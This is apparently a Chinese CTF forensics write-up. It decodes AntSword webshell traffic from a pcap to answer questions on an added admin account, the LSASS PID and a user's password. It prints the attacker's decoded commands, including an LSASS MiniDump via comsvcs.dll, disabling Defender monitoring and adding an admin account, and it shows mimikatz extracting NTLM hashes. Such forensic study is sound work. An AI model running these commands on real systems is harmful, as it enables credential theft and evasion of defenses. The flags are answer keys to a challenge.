下载附件中的 pcap
# 题目 1
管理员 Admin 账号的密码是什么?
做了一会了,第一问比较容易,直接搜 Admin 能发现端倪。但是对于后续操作就不太友好了
所以查了资料换方法了
先导出分组解析结果,里面有一个字段: urlencoded-form.value 就是 http 的 post 请求
蚁剑的命令要删除 base64 编码的前两个字符。
┌──(root㉿kali)-[~/Desktop] | |
└─# cat mayishangshu.json | grep urlencoded-form.value | awk -F': ' '{print $2}' | tr -d '"' | while read -r line; do echo "${line:2}" | base64 -d 2>/dev/null && echo -e "$(echo "${$line:2}" | base64 -d)\n"; done | grep -v '[^[:print:]]' | awk NF ORS='\n' > hacker.txt |
C:/phpStudy/PHPTutorial/WWW/onlineshop/database/onlineshop.sql | |
C:/ | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&systeminfo&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net group "domain group" /domain&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net view&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net share&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\OnlineShopBackup.zip full&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"© store.php c:\temp&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-Mppreference -DisableRealtimeMonitoring $true&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Get-MpComputerStatus&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E] | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E] | |
cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&dir c:\windows\system32&echo [S]&cd&echo [E] | |
cmd | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\windows\config&echo [S]&cd&echo [E] | |
cmd | |
cmd | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user admin Password1 /add&echo [S]&cd&echo [E] | |
cmd | |
cmd | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo [E] | |
cmd | |
cmd | |
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami /all&echo [S]&cd&echo [E] | |
cmd |
可以看到添加了一个 admin 的账号,密码是 Password1
flag: flag{Password1}
# 题目 2
LSASS.exe 的程序进程 ID 是多少?
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\OnlineShopBackup.zip full&echo [S]&cd&echo [E] |
这条命令是内网用来 Dump LSASS 程序的,一般是提取 NTLM 的。
所以 852 就是 LSASS 进程的 PID
flag: flag{852}
# 题目 3
用户 WIN101 的密码是什么?
在之前的解题过程中,通过搜索 LSASS 关键字,发现了文件,看到了 MDMP 文件头,也知道前面的命令是导出 LSASS,
所以把他提取出来,导出字节流分组
由于文件头前面加了随机字符: e1c1709 ,我们需要删除后才能用 mimikatz 进行读取
找到 WIN101 的 NTLM
┌──(root㉿kali)-[~/Desktop/x64] | |
└─# wine mimikatz.exe | |
it looks like wine32 is missing, you should install it. | |
multiarch needs to be enabled first. as root, please | |
execute "dpkg --add-architecture i386 && apt-get update && | |
apt-get install wine32:i386" | |
0024:err:winediag:ntlm_check_version ntlm_auth was not found. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution. | |
0024:err:ntlm:ntlm_LsaApInitializePackage no NTLM support, expect problems | |
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 | |
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) | |
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) | |
## \ / ## > https://blog.gentilkiwi.com/mimikatz | |
'## v ##' Vincent LE TOUX ( [email protected] ) | |
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/ | |
mimikatz # sekurlsa::minidump lsass.dmp | |
Switch to MINIDUMP : 'lsass.dmp' | |
mimikatz # sekurlsa::logonpasswords full | |
Opening : 'lsass.dmp' file for minidump... | |
... | |
* NTLM : 282d975e35846022476068ab5a3d72df | |
* SHA1 : bc9ecca8d006d8152bd51db558221a0540c9d604 | |
* DPAPI : 8d6103509e746ac0ed9641f7c21d7cf7 | |
... |
解一下 NTLM
flag: flag{admin#123}
